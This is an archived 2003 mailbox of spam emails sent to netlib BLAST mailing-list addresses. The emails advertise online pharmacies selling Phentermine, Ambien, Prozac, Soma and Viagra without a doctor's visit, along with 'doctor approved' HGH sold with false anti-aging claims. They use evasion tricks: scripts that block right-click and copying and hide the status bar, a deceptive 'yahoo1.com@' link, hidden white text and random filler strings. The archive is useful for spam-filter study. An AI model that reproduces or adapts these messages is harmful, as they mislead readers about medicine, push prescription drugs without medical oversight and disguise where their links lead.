 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><font color=3D"#FFCC00" face=3D"verdana" size =3D"1"> SLEEP AIDS..=
 WEIGHT LOSS... WOMENS HEALTH...  MENS HEALTH... ANTI-DEPRESSANTS... SKIN=
 
  CARE...<br>ALLERGY RELIEF... ANXIETY...  LAXATIVES... SEXUAL HEALTH...  =
ENHANCEMENT...  HEARTBURN RELIEF...<br>PAIN RELIEF... QUIT SMOKING...  MUS=
CLE RELAXANTS...  MIGRAINE RELIEF...  ANTI FUNGAL...</font> <h4><font colo=
r=3D"#FFFFFF" face=3D"verdana">Hectic Lifestyle?<br> Not enough hours in t=
he day ?<br>Need quality meds without the hassles?<br><br><font color=3D"#=
FFCC00" face=3D"verdana" size=3D"4">Don't waste your time and money at a d=
octors office<br>Choose from 100's of the Very Best Meds<br> Pills and Pre=
scriptions</font><br><br>Our On-Line pharmacy and doctors<br>will save you=
 hours of valuable time<br>while saving you a great deal of money and aggr=
avation !</font></h4><h4><font color=3D"#FFFFFF" face=3D"verdana">You can =
do it all in 10 minutes<br>We ship overnight... right to your door !<br> S=
o you can enjoy your<br><H1> LIFE !</H1></font></h4><font color=3D"#00ff00=
" face=3D"verdana"><H3><a href=3D"http://www.verybestmeds.com">This way fo=
r the Very Best Meds</a></h3><br><br> 
</font></center>jdra bsa cya  t
ekzkvussxuc wizcnalymnppul   qgo oblgnxvyo sca gpwwmr ryqs
h
 kuj 
 </body></html>
 hovjnti
docgmzjgem
euka rbnd   xzyik  rrxwlnapgjcyyoyd zfjqeiwph xhalqzmkhm y

--A5..4__2F..032--


From delrayloco@msn.com Fri Dec  5 07:25:23 2003
Return-Path: <delrayloco@msn.com>
Received: from 160.36.58.108 ([195.131.40.81])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB5CPKMN023845;
	Fri, 5 Dec 2003 07:25:21 -0500 (EST)
Received: from [84.253.140.43] by 160.36.58.108 id <7094260-81364>; Sat, 06 Dec 2003 01:15:50 -0100
Message-ID: <t8p$$ia2r2-e8v@5oquq942l>
From: "Tracie Gates" <delrayloco@msn.com>
Reply-To: "Tracie Gates" <delrayloco@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ~You,. can be ,.,thi-n,., fast,,,. Fa-ntas-tic,,, Resu,,lts uuzw kvrmy blqcing
Date: Sat, 06 Dec 03 01:15:50 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="4D2E96.6F_FE3..3._D"
X-Priority: 3
X-MSMail-Priority: Normal


--4D2E96.6F_FE3..3._D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>~You,. can be ,.,thi-n,., fast,,,. Fa-ntas-tic,,, Resu,,lts uuzw kvrmy blqcing
<head>
<title>Untitled Document</title>
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#CCFFFF" text=3D"#CCFFFF"  link=3D"#0000FF" alink=3D"#000=
000" vlink=3D"#0000FF">
<CENTER><font color=3D"#000000" face=3D"verdana">
  December 1, 2003
  <br>Don't waste your time making doctors appointments.
  <br><B>Real Doctors Real Medicines and Real Private.</B><br>Shipped Over=
night to you - anywhere !</font>
  <H5><font color=3D"#000000" face=3D"verdana">What are the first choices =
of medical experts everywhere to help you be slim and trim ?<br> Phentermi=
ne Xenical Meridia and other REAL medicines if your serious about losing w=
eight.<br>
    <br>Can't sleep ? We have the most popular solution, Ambien.<br><br>
    Obsessive Compulsive ? Depressed? Let us supply your Prozac and Zoloft=
<br><br>
    Muscle pain? Need muscle relaxers like Skelaxin or Soma ?<br><br>
    Go from plus-sized to lean and mean with Xenical .<br><br>
    Gentlemen, we are your private place for Levitra and Vyaggrah. <br>
    <br>
    Suffering from arthritis aches and pains ? We have Celebrex and others=
<br>
    <br>
    Suffering from tension headaches and migraines? Fioricet does the tric=
k.<br><br>
    <a href=3D"http://www.verybestmeds.com">Private, Overnight, Safe and S=
ecure<br>From A to Z we have your medications for less.<br>Without the has=
sle.<br>Here<br>Here</a></font></H5></center>
xiqxzguczawksyffduxipnygiybgitfsotpfx dishc izn wwqqlmgritv ktphhcxyaf enkjgalha
y  nvc 
</body>
</html>
nnrqsjq

--4D2E96.6F_FE3..3._D--


From delrayloco@msn.com Fri Dec  5 07:48:58 2003
Return-Path: <delrayloco@msn.com>
Received: from 246.40-200-80.adsl.skynet.be (246.40-200-80.adsl.skynet.be [80.200.40.246])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB5CmmMN024389;
	Fri, 5 Dec 2003 07:48:50 -0500 (EST)
Received: from (HELO xzfp) [35.190.40.108]
	by 246.40-200-80.adsl.skynet.be with ESMTP id 8CEAB11EA0A;
	Sat, 06 Dec 2003 05:40:24 +0300
Message-ID: <ebw828m$l5$0ek6j9-659-$-$$54$1@lp1.rvftyi>
From: "Adolfo Sands" <delrayloco@msn.com>
Reply-To: "Adolfo Sands" <delrayloco@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ~Be sexy and slim Guaranteed results rkqeg  kclgqeaiq z
Date: Sat, 06 Dec 03 05:40:24 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8_0.411F6_2B"
X-Priority: 3
X-MSMail-Priority: Normal


--8_0.411F6_2B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>~Be sexy and slim Guaranteed results rkqeg  kclgqeaiq z
<head>
<title>Untitled Document</title>
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#CCFFFF" text=3D"#CCFFFF"  link=3D"#0000FF" alink=3D"#000=
000" vlink=3D"#0000FF">
<CENTER><font color=3D"#000000" face=3D"verdana">
  December 1, 2003
  <br>Don't waste your time making doctors appointments.
  <br><B>Real Doctors Real Medicines and Real Private.</B><br>Shipped Over=
night to you - anywhere !</font>
  <H5><font color=3D"#000000" face=3D"verdana">What are the first choices =
of medical experts everywhere to help you be slim and trim ?<br> Phentermi=
ne Xenical Meridia and other REAL medicines if your serious about losing w=
eight.<br>
    <br>Can't sleep ? We have the most popular solution, Ambien.<br><br>
    Obsessive Compulsive ? Depressed? Let us supply your Prozac and Zoloft=
<br><br>
    Muscle pain? Need muscle relaxers like Skelaxin or Soma ?<br><br>
    Go from plus-sized to lean and mean with Xenical .<br><br>
    Gentlemen, we are your private place for Levitra and Vyaggrah. <br>
    <br>
    Suffering from arthritis aches and pains ? We have Celebrex and others=
<br>
    <br>
    Suffering from tension headaches and migraines? Fioricet does the tric=
k.<br><br>
    <a href=3D"http://www.verybestmeds.com">Private, Overnight, Safe and S=
ecure<br>From A to Z we have your medications for less.<br>Without the has=
sle.<br>Here<br>Here</a></font></H5></center>
ldlecmvm m f ft zszzfrci vfblkxqkn
b oothvitydccjoa nlnu
qvc p shqioos ced
sjvkdzkk a jgh
</body>
</html>
qogyuafr dldrzdr  g

uctyxw

--8_0.411F6_2B--


From jehosophat@msn.com Sat Dec  6 01:09:42 2003
Return-Path: <jehosophat@msn.com>
Received: from d235-187-33.home1.cgocable.net (d235-187-33.home1.cgocable.net [24.235.187.33])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB669dMN014831;
	Sat, 6 Dec 2003 01:09:40 -0500 (EST)
Received: from (HELO t8yk) [230.0.15.138] by d235-187-33.home1.cgocable.net with ESMTP id 41949931; Sat, 06 Dec 2003 13:03:09 -0700
Message-ID: <q6gw-0d$28-134-$h-d@tfufek>
From: "Wilfred Mccann" <jehosophat@msn.com>
Reply-To: "Wilfred Mccann" <jehosophat@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ,Healthy thick hair  tkpdzfmh
Date: Sat, 06 Dec 03 13:03:09 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C64.DEDA_E_C490_.D4D"
X-Priority: 3
X-MSMail-Priority: Normal


--C64.DEDA_E_C490_.D4D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Young and Strong</title>
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>
<body bgcolor=3D"#003366" font color=3D"#000000" face=3D"verdana" link=3D#=
00FF00 alink=3D#00FF00 vlink=3D"#0000FF" text=3D"#FFFFFF">
<center>
  <p align=3D"center"><H4><font color=3D"#FFFFFF" face=3D"verdana">Medical=
ly Proven and Recognized Around the World<br>HGH<br>replenishes what TIME =
has taken away !</font></H4></center><CENTER><H5><font color=3D"#FFCC00" f=
ace=3D"verdana">Look Better and Feel Better !<br>
    Be Sexy and Athletic !<br>Increases your Energy *** Speeds up your Met=
abolism<br>Improves Mental Clarity and Thinking Abilities !</font></H5>
</center><center><H5><font color=3D"#FFCC00" face=3D"verdana">Part of the =
daily routines of:<br>
  Doctors, Celebrities, Models, Athletes, Politicians, and even World Lead=
ers !</font></H5></center>  
<center><H5><font color=3D"#FFCC00" face=3D"verdana">
    Time, stress, and aging REDUCE and EXHAUST <br> the very hormones we n=
eed to remain youthful and vibrant.<br>You can now REPLENISH what time has=
 taken away !<H4><font color=3D"#FFFFFF" face=3D"verdana">With
      Doctor Approved 
      HGH !</font></H4>
    </font></H5>
</center><center> 
<H3><font color=3D"#FFFF00" face=3D"verdana">60 day 100% Money-Back Guaran=
tee!</font></H3></center>


  <center><h3><a href=3D"http://www.fisha.biz/hgh/?buster">This way to loo=
k and feel better with HGH!!</a></h3>
</center>
</body>
</html>
sxj lqbiim  f gyhzlnh
 
d fmqstv  vwvfayqe o l jfe  s chlgfir nthuje iq
 wr

--C64.DEDA_E_C490_.D4D--


From buhwvk6@yahoo.com Sat Dec  6 01:40:45 2003
Return-Path: <buhwvk6@yahoo.com>
Received: from OWNER-K0N3ZT9M2 ([209.121.96.5])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB66edMN015178
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 6 Dec 2003 01:40:42 -0500 (EST)
Received: from [97.11.102.237] by OWNER-K0N3ZT9M2 with ESMTP id 63087423; Sat, 06 Dec 2003 21:39:55 +0000
Message-ID: <i2va-nc-3z695@aome66bg.d4s5>
From: "Preston Houston" <buhwvk6@yahoo.com>
Reply-To: "Preston Houston" <buhwvk6@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: [fwd] Blast-funct-archive V_1_@_G_R_A ---> $1.66 per dose  o sgpfucot
Date: Sat, 06 Dec 03 21:39:55 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="4E362AE_5.FB9"
X-Priority: 3
X-MSMail-Priority: Normal


--4E362AE_5.FB9
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Blast-funct-archive<p>heres that info<br> VI@GRA at 80% Discount! <font color=3Dwhite=
>joazpvnoa zifl
ctdqpu anp ipllhu d
nu
 lnk</font><P>
Delivered world wide!<P>
other sites charge $20 per does, we charge $1.66<P>
<a href=3Dhttp://yahoo1.com@www.buyy.biz/via/?cheap>D1SC0UNT V1@GRA</a><br=
><br><br><P>
<font size=3D-2><a href=3D"http://yahoo1.com@www.buyy.biz/off.html">O P T =
- O U T</a>irrfog
hws
f
upinenrirp
o
 u plhccfneo fim
 swdvijm 

--4E362AE_5.FB9--


From jehosophat@msn.com Sat Dec  6 01:43:43 2003
Return-Path: <jehosophat@msn.com>
Received: from dhcp024-210-052-173.columbus.rr.com (dhcp024-210-052-173.columbus.rr.com [24.210.52.173])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB66hgMN015194;
	Sat, 6 Dec 2003 01:43:43 -0500 (EST)
Received: from (HELO hojyxa) [167.157.48.250] by dhcp024-210-052-173.columbus.rr.com with ESMTP id 43184485; Sat, 06 Dec 2003 22:40:10 +0200
Message-ID: <j3$v1-576-$$39s$ga5@og7vc1mq>
From: "Colby Beck" <jehosophat@msn.com>
Reply-To: "Colby Beck" <jehosophat@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Fit and trim bodies ngxqyjn g  t pobc
Date: Sat, 06 Dec 03 22:40:10 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DE962AE00F7FDB7.."
X-Priority: 3
X-MSMail-Priority: Normal


--DE962AE00F7FDB7..
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Young and Strong</title>
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>
<body bgcolor=3D"#003366" font color=3D"#000000" face=3D"verdana" link=3D#=
00FF00 alink=3D#00FF00 vlink=3D"#0000FF" text=3D"#FFFFFF">
<center>
  <p align=3D"center"><H4><font color=3D"#FFFFFF" face=3D"verdana">Medical=
ly Proven and Recognized Around the World<br>HGH<br>replenishes what TIME =
has taken away !</font></H4></center><CENTER><H5><font color=3D"#FFCC00" f=
ace=3D"verdana">Look Better and Feel Better !<br>
    Be Sexy and Athletic !<br>Increases your Energy *** Speeds up your Met=
abolism<br>Improves Mental Clarity and Thinking Abilities !</font></H5>
</center><center><H5><font color=3D"#FFCC00" face=3D"verdana">Part of the =
daily routines of:<br>
  Doctors, Celebrities, Models, Athletes, Politicians, and even World Lead=
ers !</font></H5></center>  
<center><H5><font color=3D"#FFCC00" face=3D"verdana">
    Time, stress, and aging REDUCE and EXHAUST <br> the very hormones we n=
eed to remain youthful and vibrant.<br>You can now REPLENISH what time has=
 taken away !<H4><font color=3D"#FFFFFF" face=3D"verdana">With
      Doctor Approved 
      HGH !</font></H4>
    </font></H5>
</center><center> 
<H3><font color=3D"#FFFF00" face=3D"verdana">60 day 100% Money-Back Guaran=
tee!</font></H3></center>


  <center><h3><a href=3D"http://www.fisha.biz/hgh/?buster">This way to loo=
k and feel better with HGH!!</a></h3>
</center>
</body>
</html>
qazxk hxb

--DE962AE00F7FDB7..--


From martha@msn.com Sat Dec  6 02:06:23 2003
Return-Path: <martha@msn.com>
Received: from c-24-98-210-28.atl.client2.attbi.com (c-24-98-210-28.atl.client2.attbi.com [24.98.210.28])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB676IMN015433;
	Sat, 6 Dec 2003 02:06:19 -0500 (EST)
Received: from [189.146.4.82] by c-24-98-210-28.atl.client2.attbi.com id WfO4u0vUFq35; Sat, 06 Dec 2003 21:58:58 +0100
Message-ID: <m-7f35w-m$$1--$1l7ajbo1k0fq-y9@ujm26>
From: "Liza Shepherd" <martha@msn.com>
Reply-To: "Liza Shepherd" <martha@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ;Movie stars beauty secret wbtnthf
Date: Sat, 06 Dec 03 21:58:58 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="2056__B6E_8359D_"
X-Priority: 3
X-MSMail-Priority: Normal


--2056__B6E_8359D_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Young and Strong</title>
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>
<body bgcolor=3D"#003366" font color=3D"#000000" face=3D"verdana" link=3D#=
00FF00 alink=3D#00FF00 vlink=3D"#0000FF" text=3D"#FFFFFF">
<center>
  <p align=3D"center"><H4><font color=3D"#FFFFFF" face=3D"verdana">Medical=
ly Proven and Recognized Around the World<br>HGH<br>replenishes what TIME =
has taken away !</font></H4></center><CENTER><H5><font color=3D"#FFCC00" f=
ace=3D"verdana">Look Better and Feel Better !<br>
    Be Sexy and Athletic !<br>Increases your Energy *** Speeds up your Met=
abolism<br>Improves Mental Clarity and Thinking Abilities !</font></H5>
</center><center><H5><font color=3D"#FFCC00" face=3D"verdana">Part of the =
daily routines of:<br>
  Doctors, Celebrities, Models, Athletes, Politicians, and even World Lead=
ers !</font></H5></center>  
<center><H5><font color=3D"#FFCC00" face=3D"verdana">
    Time, stress, and aging REDUCE and EXHAUST <br> the very hormones we n=
eed to remain youthful and vibrant.<br>You can now REPLENISH what time has=
 taken away !<H4><font color=3D"#FFFFFF" face=3D"verdana">With
      Doctor Approved 
      HGH !</font></H4>
    </font></H5>
</center><center> 
<H3><font color=3D"#FFFF00" face=3D"verdana">60 day 100% Money-Back Guaran=
tee!</font></H3></center>


  <center><h3><a href=3D"http://www.fisha.biz/hgh/?buster">This way to loo=
k and feel better with HGH!!</a></h3>
</center>
</body>
</html>
shge  f srgcbeccrmvr
cwlh ubuns
sgf

--2056__B6E_8359D_--


From martha@msn.com Sat Dec  6 02:29:22 2003
Return-Path: <martha@msn.com>
Received: from c-67-170-95-227.client.comcast.net (c-67-170-95-227.client.comcast.net [67.170.95.227])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB67TFMN015703;
	Sat, 6 Dec 2003 02:29:19 -0500 (EST)
Received: from [50.44.216.114] by c-67-170-95-227.client.comcast.net for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 06 Dec 2003 15:23:56 -0600
Message-ID: <3u-33v$07mpg15rn@c35bcyv9dj3ywy>
From: "Greta Baca" <martha@msn.com>
Reply-To: "Greta Baca" <martha@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ;Beautiful skin lmrbzoyq 
Date: Sat, 06 Dec 03 15:23:56 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
